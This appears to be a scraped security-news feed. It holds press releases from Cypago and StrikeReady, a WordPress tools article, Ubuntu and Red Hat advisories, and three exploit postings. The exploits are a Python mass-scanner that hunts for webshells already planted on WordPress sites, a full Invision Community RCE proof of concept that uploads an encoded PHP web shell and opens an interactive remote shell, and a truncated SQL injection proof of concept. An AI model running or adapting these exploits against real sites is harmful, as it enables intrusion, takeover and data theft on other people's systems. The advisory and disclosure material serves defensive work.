By cybernewswire
Tel Aviv, Israel, April 10th, 2024, CyberNewsWire Cyber GRC software company Cypago has announced a new automation solution…
This is a post from HackRead.com Read the original post: Cypago Announces New Automation Support for AI Security and Governance

**Tel Aviv, Israel, April 10th, 2024, CyberNewsWire**

Cyber GRC software company Cypago has announced a new automation solution for artificial intelligence (AI) governance, risk management and compliance. This includes implementation of NIST AI RMF and ISO/IEC 42001, the newest AI security and governance frameworks. With more and more companies integrating new AI tools into their business processes, daily operations, and customer-facing products and services, safe and compliant use of AI has become a pivotal challenge.

Enterprises are adopting AI-powered tools and solutions at a staggering pace, thanks to the increasing power and democratization of AI platforms, and the extensive benefits that artificial intelligence can bring to business operations. However, AI also brings many dangers, including the potential for leaking private data, lack of transparency, and increasingly complex cyber threats. Organizations also need to prepare themselves for more legislation regulating the use and application of AI in business settings. 

The best way to protect against these dangers and stay ahead of AI regulations is through adherence to best practices for cyber GRC governance, which are in a constant state of flux. By providing comprehensive risk management, automated 24/7 monitoring, and cybersecurity governance tailored to AI solutions, Cypago enables companies to seamlessly secure their AI initiatives. 

“The world of AI is changing quickly, with new threats arising all the time and new regulations arriving frequently. We view it as our responsibility to help organizations maximize the benefits of AI while effectively mitigating the risks and ensuring compliance with best practices and good governance,” said Arik Solomon, CEO of Cypago. “These latest features ensure that Cypago supports the newest AI and cyber governance frameworks, enabling GRC and cybersecurity teams to automate GRC with the most up-to-date requirements.” 

Cypago delivers ongoing visibility into all the organization’s tools, applications, and models, while automating many processes needed for effective risk assessment and threat detection. Its heightened security measures for AI-based systems help keep data and software secure, reducing the risk of cyber threats, data breaches and regulatory violations. 

What’s more, Cypago is no stranger to the implementation of safe AI, having adopted natural language models and generative AI command prompts as part of its product in 2023.

The platform streamlines security, risk management and compliance gap detection and remediation processes, enabling teams to respond more effectively to emerging threats and vulnerabilities, while ensuring compliance with international, national, and industry-specific regulations. This empowers companies to navigate the complex compliance landscape, which now encompasses the use of AI, with confidence. 

**About Cypago**

Cypago’s revolutionary SaaS-based Cyber GRC Automation (CGA) platform redefines the three lines model by eliminating friction and bridging the gap between management, security, and operations. It transforms GRC initiatives into automated processes, enabling in-depth visibility, streamlining enforcement, and significantly reducing overall costs. The platform leverages innovative technologies, including advanced analysis and correlation engines, GenAI, and NLP models, designed to support any security framework in any IT environment, both in the cloud and on-premises. Cypago was founded in 2020 by tech leaders and cybersecurity veterans with decades of combined experience in the development, operations, and commercialization of cybersecurity solutions. For more information, visit https://cypago.com/. 

**Contact**

**PR**  
**Dan Edelstein**  
**InboundJunction**  
**\[email protected\]**

Cypago Announces New Automation Support for AI Security and Governance

By Owais Sultan
WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small…
This is a post from HackRead.com Read the original post: The Essential Tools and Plugins for WordPress Development

WordPress, a widely used content management system, owes a great deal of its flexibility to plugins. These small software components effortlessly improve the functionality of your website. Having the right resources and tools is crucial for developers venturing into WordPress development services. Let’s explore the essential elements that can facilitate and enhance your journey in this field.

****Essential Tools for WordPress Development****

WordPress powers millions of websites worldwide (472 million), from personal blogs to enterprise-level e-commerce platforms. Developers face challenges in such a diverse ecosystem, from writing clean and efficient code to ensuring seamless website deployment and maintenance. The right tools act as enablers, empowering developers to navigate these challenges easily and precisely.

****Code Editors****

Choosing a suitable code editor is akin to selecting the right brush for an artist. Versatile editors like Visual Studio Code or Sublime Text provide many features such as syntax highlighting, auto-completion, and Git integration. These features enhance productivity and foster a conducive environment for writing clean, maintainable code.

****Local Development Environments****

Developing and testing WordPress websites on a live server can be risky and inefficient. Local development environments, facilitated by tools like XAMPP, MAMP, or Docker, provide a safe and controlled environment for experimentation and iteration. Developers can test new features, plugins, and themes without fearing disrupting the live website, ensuring a seamless user experience upon deployment.

****Version Control Systems****

Version control systems like Git are the backbone of efficient teamwork in a collaborative development environment. Paired with platforms like GitHub or Bitbucket, these systems enable developers to manage code changes seamlessly, collaborate with team members in real time, and maintain a comprehensive project history. This fosters a cohesive and organized development environment, ensuring everyone is on the same page throughout the development lifecycle.

****Debugging Tools****

No code is perfect, and debugging is inevitable in the development process. Specialized debugging tools like Query Monitor or Debug Bar provide developers with invaluable insights into the inner workings of their WordPress projects. These tools are indispensable for maintaining a robust and efficient website, from identifying and troubleshooting issues to monitoring performance and optimizing the codebase.

****Must-Have Plugins for WordPress Development****

WordPress’s flexibility and extensibility are key factors contributing to its popularity among developers worldwide. However, the sheer volume of available plugins can be overwhelming, making it essential for developers to discern and integrate the most suitable ones into their projects. Here’s why selecting the right plugins is imperative for effective WordPress development:

****SEO Plugins****

Optimizing websites for search engines is essential for driving organic traffic and enhancing visibility. SEO plugins like Yoast SEO or Rank Math provide developers with robust tools to optimize their WordPress sites effectively. Features such as XML sitemap generation, meta tag optimization, and comprehensive content analysis empower developers to bolster their site’s visibility and relevance in search engine results, increasing organic traffic and user engagement.

****Performance Optimization Plugins****

User experience is paramount in retaining visitors and fostering engagement on WordPress websites. Performance optimization plugins such as WP Rocket or W3 Total Cache offer many optimization features to improve site speed and performance. From caching mechanisms to asset minification and lazy loading, these plugins ensure a snappier and more responsive user experience, leading to higher user satisfaction and retention.

****Security Plugins****

Protecting WordPress websites against security threats is a top priority for developers. Security plugins like Wordfence or Sucuri Security fortify the site’s defences with features such as firewall protection, malware scanning, and enhanced login security. By implementing these plugins, developers can ensure peace of mind against potential threats and vulnerabilities, safeguarding their websites and user data from malicious attacks.

****Development & Debugging Plugins****

Efficient development workflows are essential for maintaining productivity and delivering high-quality WordPress projects. Development and debugging plugins such as Query Monitor or Debug Bar streamline debugging and optimization by providing critical insights into database queries, PHP errors, and HTTP requests. By leveraging these plugins, developers can identify and address issues swiftly, ensuring the seamless operation of WordPress projects and minimizing development time.

****Elevate Your WordPress Development Experience****

Integrating these indispensable tools and plugins into your WordPress development arsenal empowers you to transcend boundaries, streamline processes, and unlock the full potential of your projects. By staying abreast of the latest advancements in the WordPress ecosystem, you can continually refine and optimize your development practices, fostering innovation and excellence in your endeavours.

1.  What To Look For In The Best WordPress Hosting
2.  What is WooCommerce, and Why You Should Care
3.  Kotlin app development company – How to choose
4.  Tips for Using Uploader Widgets on WordPress Blogs
5.  MySQL Performance Tuning: 5 Tips for Blazing Fast Queries

The Essential Tools and Plugins for WordPress Development

It was discovered that a race condition existed in the io_uring subsystem in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. Lonial Con discovered that the netfilter subsystem in the Linux kernel contained a memory leak when handling certain element flush operations. A local attacker could use this to expose sensitive information (kernel memory). Various other issues were also addressed.

Linux kernel vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

-   Ubuntu 20.04 LTS  
-   Ubuntu 18.04 LTS  
-   Ubuntu 16.04 ESM  
-   Ubuntu 22.04 LTS  
-   Ubuntu 14.04 ESM

Summary

Several security issues were fixed in the kernel.

Software Description

-   linux - Linux kernel  
-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems  
-   linux-azure - Linux kernel for Microsoft Azure Cloud systems  
-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems  
-   linux-gke - Linux kernel for Google Container Engine (GKE) systems  
-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems  
-   linux-ibm - Linux kernel for IBM cloud systems

Details

It was discovered that a race condition existed in the io_uring  
subsystem in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-1872)

Lonial Con discovered that the netfilter subsystem in the Linux kernel  
contained a memory leak when handling certain element flush operations.  
A local attacker could use this to expose sensitive information (kernel  
memory). (CVE-2023-4569)

It was discovered that the TLS subsystem in the Linux kernel did not  
properly perform cryptographic operations in some situations, leading to  
a null pointer dereference vulnerability. A local attacker could use  
this to cause a denial of service (system crash) or possibly execute  
arbitrary code. (CVE-2023-6176)

It was discovered that a race condition existed in the AppleTalk  
networking subsystem of the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2023-51781)

Jann Horn discovered that the TLS subsystem in the Linux kernel did not  
properly handle spliced messages, leading to an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of  
service (system crash) or possibly execute arbitrary code.  
(CVE-2024-0646)

Notselwyn discovered that the netfilter subsystem in the Linux kernel  
did not properly handle verdict parameters in certain cases, leading to  
a use- after-free vulnerability. A local attacker could use this to  
cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2024-1086)

Update instructions

The problem can be corrected by updating your kernel livepatch to the  
following versions:

Ubuntu 20.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    gke - 102.1  
    gkeop - 102.1  
    ibm - 102.1  
    lowlatency - 102.1

Ubuntu 18.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    lowlatency - 102.1

Ubuntu 16.04 ESM  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    lowlatency - 102.1

Ubuntu 22.04 LTS  
    aws - 102.1  
    azure - 102.1  
    gcp - 102.1  
    generic - 102.1  
    gke - 102.1  
    ibm - 102.1  
    lowlatency - 102.1

Ubuntu 14.04 ESM  
    generic - 102.1  
    lowlatency - 102.1

Support Information

Livepatches for supported LTS kernels will receive upgrades for a period  
of up to 13 months after the build date of the kernel.

Livepatches for supported HWE kernels which are not based on an LTS  
kernel version will receive upgrades for a period of up to 9 months  
after the build date of the kernel, or until the end of support for that  
kernel’s non-LTS distro release version, whichever is sooner.

References

-   CVE-2023-1872  
-   CVE-2023-4569  
-   CVE-2023-6176  
-   CVE-2023-51781  
-   CVE-2024-0646  
-   CVE-2024-1086

Kernel Live Patch Security Notice LSN-0102-1

Red Hat Security Advisory 2024-1706-03 - An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available. Red Hat Product Security has rated this update as having a security impact of Important. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Issues addressed include denial of service and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1706.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11)  
Advisory ID:        RHSA-2024:1706-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1706  
Issue date:         2024-04-09  
Revision:           03  
CVE Names:          CVE-2024-1023  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11).  
Red Hat Product Security has rated this update as having a security impact of  
Important.  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products

Description:

An update for Red Hat Build of Apache Camel 4.0 for Quarkus 3.2 is now available (updates to RHBQ 3.2.11).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* TRIAGE CVE-2024-25710 commons-compress: Denial of service caused by an infinite loop for a corrupted DUMP file  
* TRIAGE CVE-2024-26308 commons-compress: OutOfMemoryError unpacking broken Pack200 file  
* TRIAGE CVE-2024-1300 vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support  
* TRIAGE CVE-2024-1023 vert.x: io.vertx/vertx-core: memory leak due to the use of Netty FastThreadLocal data structures in Vertx

Solution:

CVEs:

CVE-2024-1023

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-1706-03

PRESS RELEASE

DALLAS – April 9, 2024 – StrikeReady, the AI-pioneer advancing the way modern security teams operate, today announced $12 million in funding. The Series A round was led by 33N Ventures, with participation from Hitachi Ventures, Monta Vista Capital and industry luminaries Brian NeSmith, executive chairman and former CEO at Arctic Wolf; and Rod Beckstrom, former CEO of ICANN and Founding Director of U.S. National Cybersecurity Center (now CISA). 

StrikeReady is revolutionizing cybersecurity with its groundbreaking, vendor-neutral AI security operations platform. This one-of-a-kind solution seamlessly integrates with organizations existing security tools, unifying the entire tech stack. StrikeReady’s command center makes SOC teams more efficient and effective by uniting, centralizing and operationalizing security, fostering smarter, faster decision-making and proactive security defense.

SOC environments are complex and the tools traditionally used to manage security have proven ineffective and inefficient in bringing disparate technologies together and keeping companies ahead of threats. Further complicating the issue is the perpetual shortage of skilled security professionals, which hampers the ability to manage and respond to security incidents, leaving organizations vulnerable to cyber threats.

These challenges are driving the growth of StrikeReady, which is transforming the way modern security teams operate by reinventing how everything works together, while delivering a comprehensive, trustworthy view of security threats.

“Our security management platform up-levels and scales the capability of any SOC by making best-of-breed AI automation accessible and affordable for everyone,” Founder and CEO Yasir Khalid said. “The platform leverages AI to streamline and automate the routine and empower better, faster response to complex threats. Until now, our customers have referred to StrikeReady as a ‘well-kept secret’, but this funding will accelerate market awareness and growth.”

StrikeReady has secured Series A funding amidst challenging investment conditions, a testament to the sophistication of its AI solution and the pressing cybersecurity challenges it addresses. Despite turbulent times, StrikeReady’s innovative approach to how security teams work has garnered significant investor confidence, positioning the company as a leader in cybersecurity. StrikeReady intends to use its new funding to extend its product leadership in AI-based SOC technology, ramp its global go-to-market team, and continue scaling its infrastructure.

"StrikeReady is breaking the mold of conventional security solutions. We refuse to believe that security-centric companies should be confined to one platform. Instead, we champion the idea that teams should have the freedom to utilize the best-of-breed technology available,” said Carlos Moreira da Silva, co-founder and partner at 33N Ventures. “StrikeReady turns this belief into reality through its dedication to seamless integrations, ensuring compatibility with the diverse array of tools utilized by SOC teams today and tomorrow.”

“StrikeReady pioneers a groundbreaking AI-powered Security Command Center. Their hybrid model augments human intuition with cutting-edge AI and ML technologies. The mission: Streamlining tool sprawl, bridging the cybersecurity skills gap, all while placing humans – equipped with unparalleled guidance and automation – firmly at the helm of the cyber defense arsenal,” said Galina Sagan, Principal at Hitachi Ventures.

About StrikeReady:

Founded in 2019, StrikeReady is an AI pioneer in cybersecurity. StrikeReady introduces the first unified, vendor-agnostic, AI-powered security command center, purpose-built for modern SOC teams to optimize, centralize and accelerate a company’s threat response.

StrikeReady remains at the forefront of advancing beyond traditional AI and large language model (LLM) to a proprietary large action model (LAM), which takes actions across the technology stack based on a user’s prompts. The company’s forward-thinking AI technology has earned several external accolades, including validation from Gartner, which called the company out as the only Virtual Security Assistant in its Gartner Emerging Technologies: Tech Innovators in Advanced Virtual Assistants report.

The platform’s user-centric approach uplevels the entire security team into a proactive AI-powered cyber task force by dynamically centralizing, informing and advising security teams with a smarter, holistic and actionable defense against an ever-evolving threat landscape.

StrikeReady helps companies simultaneously reduce cyber threats and overcome the cyber talent deficit. For CISOs and security leaders who want more information on StrikeReady’s unified AI-powered security platform:

 Request a demo or Learn more.

About 33N:

33N is a specialized cybersecurity and infrastructure software European venture capital fund investing globally in €1-€10M ARR companies. 33N is made up of an experienced and established international team investing in the space for the last 10 years. The fund is supported by a strong Strategic Committee and Advisory Board encompassing +40 top entrepreneurs, experts and decision-makers spread worldwide and across the industry. Find more about 33N at https://33n.vc

StrikeReady Raises $12M for AI Security Command Platform

WordPress Travelscape theme version 1.0.3 suffers from an arbitrary file upload vulnerability.

    # Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload# Date: 2024-04-01# Author: Milad Karimi (Ex3ptionaL)# Category : webapps# Tested on: windows 10 , firefoximport sysimport os.pathimport requestsimport reimport urllib3from requests.exceptions import SSLErrorfrom multiprocessing.dummy import Pool as ThreadPoolfrom colorama import Fore, initinit(autoreset=True)error_color = Fore.REDinfo_color = Fore.CYANsuccess_color = Fore.GREENhighlight_color = Fore.MAGENTArequests.urllib3.disable_warnings()headers = {    'Connection': 'keep-alive',    'Cache-Control': 'max-age=0',    'Upgrade-Insecure-Requests': '1',    'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107Mobile Safari/537.36',    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',    'Accept-Encoding': 'gzip, deflate',    'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',    'Referer': 'www.google.com'}def URLdomain(url):    if url.startswith("http://"):        url = url.replace("http://", "")    elif url.startswith("https://"):        url = url.replace("https://", "")    if '/' in url:        url = url.split('/')[0]    return urldef check_security(url):    fg = success_color    fr = error_color    try:        url = 'http://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/travelscape/json.php', headers=headers,allow_redirects=True, timeout=15)        if 'MSQ_403' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/travelscape/json.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/themes/aahana/json.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'MSQ_403' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('MSQ_403.txt', 'a').write(url +'/wp-content/themes/aahana/json.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))        check = requests.get(url + '/wp-content/themes/travel/issue.php',headers=headers, allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url +'/wp-content/themes/travel/issue.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url + '/about.php', headers=headers,allow_redirects=True, timeout=15)        if 'Yanz Webshell!' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/about.php\n')        else:            url = 'https://' + URLdomain(url)        check = requests.get(url +'/wp-content/themes/digital-download/new.php', headers=headers,allow_redirects=True, timeout=15)        if '#0x2525' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('digital-download.txt', 'a').write(url +'/wp-content/themes/digital-download/new.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'http://' + URLdomain(url)        check = requests.get(url + '/epinyins.php', headers=headers,allow_redirects=True, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/epinyins.php\n')        else:            print(' -| ' + url + ' --> {}[Failed]'.format(fr))            url = 'https://' + URLdomain(url)        check = requests.get(url + '/wp-admin/dropdown.php',headers=headers, allow_redirects=True, verify=False, timeout=15)        if 'Uname:' in check.text:            print(' -| ' + url + ' --> {}[Successfully]'.format(fg))            open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')        else:            url = 'https://' + URLdomain(url)            check = requests.get(url +'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,allow_redirects=True, verify=False, timeout=15)            if 'Simple Shell' in check.text:                print(' -| ' + url + ' --> {}[Successfully]'.format(fg))                open('dummyyummy.txt', 'a').write(url +'/wp-content/plugins/dummyyummy/wp-signup.php\n')            else:                print(' -| ' + url + ' --> {}[Failed]'.format(fr))    except Exception as e:        print(f' -| {url} --> {fr}[Failed] due to: {e}')def main():    try:        url_file_path = sys.argv[1]    except IndexError:        url_file_path = input(f"{info_color}Enter the path to the filecontaining URLs: ")        if not os.path.isfile(url_file_path):            print(f"{error_color}[ERROR] The specified file path isinvalid.")            sys.exit(1)    try:        urls_to_check = [line.strip() for line in open(url_file_path, 'r',encoding='utf-8').readlines()]    except Exception as e:        print(f"{error_color}[ERROR] An error occurred while reading thefile: {e}")        sys.exit(1)    pool = ThreadPool(20)    pool.map(check_security, urls_to_check)    pool.close()    pool.join()    print(f"{info_color}Security check process completed successfully.Results are saved in corresponding files.")if __name__ == "__main__":    main()

WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

Invision Community versions 4.7.16 and below suffer from a remote code execution vulnerability in toolbar.php.

    ------------------------------------------------------------------------------Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability------------------------------------------------------------------------------[-] Software Link:https://invisioncommunity.com[-] Affected Versions:Version 4.7.16 and prior versions.[-] Vulnerability Description:The vulnerability is located in the/applications/core/modules/admin/editor/toolbar.php script.Specifically, into theIPS\core\modules\admin\editor\_toolbar::addPlugin() method, which willhandlethe upload of a ZIP file, trying to extract its content into the/applications/core/interface/ckeditor/ckeditor/plugins/ directory; ifthe ZIP archive does not includea plugin.js file, then the extracted ZIP content will be recursivelydeleted from the file system,otherwise it will stay there. This can be exploited to executearbitrary PHP code by uploading aZIP archive containing a plugin.js file (which can also be empty)along with a PHP file. Successfulexploitation of this vulnerability requires an Administrator accounthaving the "toolbar_manage" permission.[-] Proof of Concept:https://karmainsecurity.com/pocs/CVE-2024-30162.php[-] Solution:No official solution is currently available.[-] Disclosure Timeline:[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure[12/03/2024] - Version 4.7.16 released, but the issue is still not fixed[20/03/2024] - CVE identifier requested[24/03/2024] - CVE identifier assigned[05/04/2024] - Coordinated public disclosure[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2024-30162 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Other References:https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/[-] Original Advisory:http://karmainsecurity.com/KIS-2024-03-----------------------PoC:<?php/*    ------------------------------------------------------------------------------    Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability    ------------------------------------------------------------------------------    author..............: Egidio Romano aka EgiX    mail................: n0b0d13s[at]gmail[dot]com    software link.......: https://invisioncommunity.com    +-------------------------------------------------------------------------+    | This proof of concept code was written for educational purpose only.    |    | Use it at your own risk. Author will be not responsible for any damage. |    +-------------------------------------------------------------------------+    [-] Vulnerability Description:    The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script.    Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will    handle the upload of a ZIP file, trying to extract its content into the    /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does    not include a plugin.js file, then the extracted ZIP content will be recursively deleted    from the file system, otherwise it will stay there. This can be exploited to execute    arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can    also be empty) along with a PHP file. Successful exploitation of this vulnerability    requires an Administrator account having the "toolbar_manage" permission.    [-] Original Advisory:    https://karmainsecurity.com/KIS-2024-03*/set_time_limit(0);error_reporting(E_ERROR);if (!extension_loaded("curl")) die("[-] cURL extension required!\n");if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n");$url = $argv[1];$email = $argv[2];$passwd = $argv[3];$ch = curl_init();@unlink('./cookies.txt');curl_setopt($ch, CURLOPT_HEADER, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt');curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt');print "[+] Logging into AdminCP\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword");if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n");print "[+] Uploading malicious ZIP file\n";curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin");curl_setopt($ch, CURLOPT_POST, false);if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n");$plg = md5(time()).".zip";@file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA="));$params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)];curl_setopt($ch, CURLOPT_POSTFIELDS, $params);if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n");print "[+] Launching shell\n";curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/");curl_setopt($ch, CURLOPT_POST, false);$phpcode = "print '____'; passthru(base64_decode('%s')); print '____';";while(1){  print "\ninvision-shell# ";  if (($cmd = trim(fgets(STDIN))) == "exit") break;  curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]);  preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");}

Invision Community 4.7.16 Remote Code Execution

Invision Community versions 4.4.0 through 4.7.15 suffer from a remote SQL injection vulnerability in store.php.

--------------------------------------------------------------------  
Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
--------------------------------------------------------------------

[-] Software Link:

https://invisioncommunity.com

[-] Affected Versions:

All versions from 4.4.0 to 4.7.15.

[-] Vulnerability Description:

The vulnerability is located in the  
/applications/nexus/modules/front/store/store.php script.  
Specifically, into the  
IPS\nexus\modules\front\store\_store::_categoryView() method:

126 /* Apply Filters */  
127 if ( isset( \IPS\Request::i()->filter ) and \is_array(  
\IPS\Request::i()->filter ) )  
128 {  
129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter );  
130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues )  
131 {  
132 $where[] = array( \IPS\Db::i()->findInSet(  
"filter{$filterId}.pfm_values", array_map( 'intval', explode( ',',  
$allowedValues ) ) ) );  
133 $joins[] = array( 'table' => array( 'nexus_package_filters_map',  
"filter{$filterId}" ), 'on' => array(  
"filter{$filterId}.pfm_package=p_id AND  
filter{$filterId}.pfm_filter=?", $filterId ) );  
134 }  
135 }

User input passed through the "filter" request parameter is not  
properly sanitized before being  
assigned to the $where and $joins variables (lines 132 and 133), which  
are later used to execute  
some SQL queries. This can be exploited by unauthenticated attackers  
to carry out time-based or  
error-based Blind SQL Injection attacks. Subsequently, this might also  
be exploited to reset  
users' passwords and gain unauthorized access to the AdminCP, in order  
to achieve  
Remote Code Execution (RCE). Successful exploitation of this  
vulnerability requires  
the nexus application to be installed and configured with one "Product  
Group" at least.

[-] Proof of Concept:

https://karmainsecurity.com/pocs/CVE-2024-30163.php

[-] Solution:

Upgrade to version 4.7.16 or later.

[-] Disclosure Timeline:

[08/01/2024] - Vulnerability details sent to SSD Secure Disclosure  
[12/03/2024] - Version 4.7.16 released  
[20/03/2024] - CVE identifier requested  
[24/03/2024] - CVE identifier assigned  
[05/04/2024] - Coordinated public disclosure

[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2024-30163 to this vulnerability.

[-] Credits:

Vulnerability discovered by Egidio Romano.

[-] Other References:

https://invisioncommunity.com/release-notes/4716-r128/  
https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/

[-] Original Advisory:

http://karmainsecurity.com/KIS-2024-02

-----------------------  
PoC:

<?php

/*  
    --------------------------------------------------------------------  
    Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability  
    --------------------------------------------------------------------

    author..............: Egidio Romano aka EgiX  
    mail................: n0b0d13s[at]gmail[dot]com  
    software link.......: https://invisioncommunity.com

    +-------------------------------------------------------------------------+  
    | This proof of concept code was written for educational purpose only.    |  
    | Use it at your own risk. Author will be not responsible for any damage. |  
    +-------------------------------------------------------------------------+

    [-] Vulnerability Description:

    The vulnerability is located in the /applications/nexus/modules/front/store/store.php script.  
    Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user  
    input passed through the "filter" request parameter is not properly sanitized before being  
    assigned to the $where and $joins variables, which are later used to execute some SQL  
    queries. This can be exploited by unauthenticated attackers to carry out time-based  
    or error-based SQL Injection attacks.

    [-] Original Advisory:

    https://karmainsecurity.com/KIS-2024-02  
*/

set_time_limit(0);  
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[-] cURL extension required!\n");

if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n");

$url = $argv[1];  
$ch  = curl_init();  
$sec = 3; // number of seconds for SLEEP(): less seconds, less accurate

curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  
curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/");

function sql_injection($sql)  
{  
  global $ch, $sec;

